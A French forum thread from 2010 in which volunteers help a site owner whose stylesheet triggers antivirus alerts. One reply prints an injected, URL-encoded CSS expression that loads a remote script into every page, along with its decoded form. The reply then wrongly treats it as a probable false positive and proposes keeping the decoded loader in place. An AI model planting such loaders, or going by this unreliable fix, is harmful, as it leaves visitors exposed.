Alerte virus sur mon site

steph07 · Mai 13, 2010, 14:08:44

Bonjour à tous,
Des personnes essayant de se connecter à mon site
m'ont fait remarquer qu'ils avaient des alertes virus.
je crois qu'il s'agit d'un "cheval de troie"
N'étant pas un spécialiste en informatique, loin de la

je ne sais pas du tout comment régler ce problème.
Voilà, si quelqu'un à une piste...
bonne après-midi à tous

Bru · Mai 13, 2010, 14:48:56

Un Trojan qualifié de "peu dangereux" par Kaspersky.

Bonne chance pour l'éradiquer.

Bru

Pat91 · Mai 13, 2010, 15:14:10

Bonjour,

Il faudrait déjà que l'on sache comment le site est hébergé (serveur privé, mutualisé, dédié,...?). Par ailleurs, je n'ai aucune alerte avec NOD32. Ce qui peut vouloir dire qu'il s'agit d'un "faux positif" (ce dont Kaspersky est coutumier). Est-ce que tous ceux qui se plaignent du problème utilisent le même antivirus et lequel? Quel trojan est signalé? Avez-vous vérifié que sur votre site se trouvaient effectivement les composants de ce cheval de Troie?

Si le site est hébergé chez vous: passez un antivirus.

Si le site est hébergé par un hébergeur (a priori vous êtes chez OVH) : adressez vous au support pour qu'il vérifie.

Bru · Mai 13, 2010, 15:43:41

13/05/2010 15:40:52 Interdit: Trojan.JS.Iframe.eu http://www.vandenplas.eu/style.css Firefox

Voila le rapport Kaspersky

Bru

fabco · Mai 13, 2010, 16:34:23

idem avec avast

Pat91 · Mai 13, 2010, 19:09:46

Citation de: Bru le Mai 13, 2010, 15:43:41
13/05/2010 15:40:52 Interdit: Trojan.JS.Iframe.eu http://www.vandenplas.eu/style.css Firefox
Voila le rapport Kaspersky

Où ça? C'est juste la ligne ci-dessus?

Pat91 · Mai 13, 2010, 19:25:36

Re,

Encore une fois, s'il y a vraiment un problème et que le site est bien chez OVH comme je le pense, le trojan en question est sur le serveur. Il faut donc demander une intervention au support.

unbridgesinonrien · Mai 13, 2010, 20:07:16

Pas de problèmes pour moi ( Microsoft Security Essentials )

steph07 · Mai 13, 2010, 20:50:13

Super, merci à tous pour les infos.
Donc le virus se trouverait sur le serveur OVH ?
Je leur avais expliqué le problème, ils me répondent ceci

"Votre site doit avoir un mauvais code inséré dans une de vos pages dû à une faille de sécurité, généralement cette insertion de code se trouve dans le head de votre page principal nommé index.
> >
> > Ce type d'erreur ne parvient pas de nos hébergements mais de vos fichiers"

merci encore pour votre aide

Pat91 · Mai 13, 2010, 22:53:23

Citation de: steph07 le Mai 13, 2010, 20:50:13
Donc le virus se trouverait sur le serveur OVH ?

Forcément. Puisque c'est quand ils se connectent sur le site que certains ont une alerte. Et bien sûr, le problème est dans un des fichiers qui constituent votre site. Fichiers qui ont été remontés de chez vous, je suppose. Ce que je voulais dire, c'est que dans le cas où vous hébergiez votre site vous-même sur une de vos machines, c'est là qu'il fallait vérifier. Sinon, OVH pouvait bien faire un scan pour vous. Mais OVH et le service au client...

Question de base: si les fichiers sources de votre site sont stockés chez vous, je suppose que vous avez scanné avec un antivirus le ou les répertoires qui les contiennent? Parce que si c'est vous qui êtes contaminé, vous propagez la contamination quand vous mettez votre site à jour sur OVH.

Ceci étant, j'ai regardé le contenu du fichier .css en question et je n'y ai rien vu d'anormal sauf qu'une des sections est "URL Encoded":

On y trouve ça (script encodé):

/* a0b4df006e02184c60dbf503e71c87ad */
body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%31%35%35%38%34%34%3B%20%4A%53%53%33%20%3D%20%27%2F%70%6C%61%6E%63%68%65%73%77%65%62%63%6C%69%65%6E%74%73%2F%6F%6C%79%6D%70%69%61%64%65%73%2F%70%61%67%65%73%2F%69%6D%61%67%65%73%2F%69%6D%61%67%65%73%2F%69%6D%61%67%65%73%2F%6B%6F%70%69%6B%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%70%6C%61%6E%63%68%65%73%77%65%62%63%6C%69%65%6E%74%73%2F%6F%6C%79%6D%70%69%61%64%65%73%2F%70%61%67%65%73%2F%69%6D%61%67%65%73%2F%69%6D%61%67%65%73%2F%69%6D%61%67%65%73%2F%6B%6F%70%69%6B%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) }
/* a995d2cc661fa72452472e9554b5520c */

alors que l'on devrait en fait voir ça (version décodée)

/* a0b4df006e02184c60dbf503e71c87ad */
body {
margin-top: expression(eval('if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 155844; JSS3 = '/plancheswebclients/olympiades/pages/images/images/images/kopik/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/plancheswebclients/olympiades/pages/images/images/images/kopik/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) }; ')) }
/* a995d2cc661fa72452472e9554b5520c */

Peut-être est-ce qui fait réagir certains antivirus? Vous pouvez toujours essayer de remplacer le fichier .css en question par une version où la partie encodée serait remplacée par sa version décodée. Il suffit d'éditer le fichier dans le Bloc-Notes et de remplacer le premier texte ci-dessus par le second. Ensuite vous mettez à jour sur le serveur OVH. Gardez une copie de l'original actuel, bien sûr.

steph07 · Mai 14, 2010, 09:36:00

Bonjour
Pat91 merci de ta réponse,
le site est effectivement ébergé chez OVH.
Je vais transmettre ces corrections à l'amie qui a réalisé le site.
En ce qui me concerne, j'ai accès à une sorte de back office,
qui me permet de mettre à jour ou de créer de nouvelles séries.

merci beaucoup

steph07 · Mai 17, 2010, 11:47:55

Bonjour à tous,
voilà le site a été modifié
n'hésitez pas à me dire si vous rencontré des alertes
à la connexion.
bon après-midi
à +

Pat91 · Mai 17, 2010, 14:07:44

Citation de: steph07 le Mai 17, 2010, 11:47:55
voilà le site a été modifié
n'hésitez pas à me dire si vous rencontré des alertes
à la connexion.

Toujours pas d'alerte de mon côté avec NOD32.

N'ayant pas d'actions chez ESET, j'en profite pour rappeler que NOD32 est de tous les antivirus que j'ai utilisés jusqu'ici, le moins encombrant, le plus rapide, le moins pénalisant au niveau performances, le mieux classé quant à la capacité de détection et celui avec lequel je n'ai jamais eu le moindre "faux positif" (voir accident majeur récent avec McAfee).

S'il n'a pas réagi sur votre site alors que les autres indiquaient un problème pour cause probable de mauvaise interprétation d'un code, c'est peut-être aussi parce qu'il fait mieux le tri.

steph07 · Mai 17, 2010, 14:37:47

merci d'être passé Pat91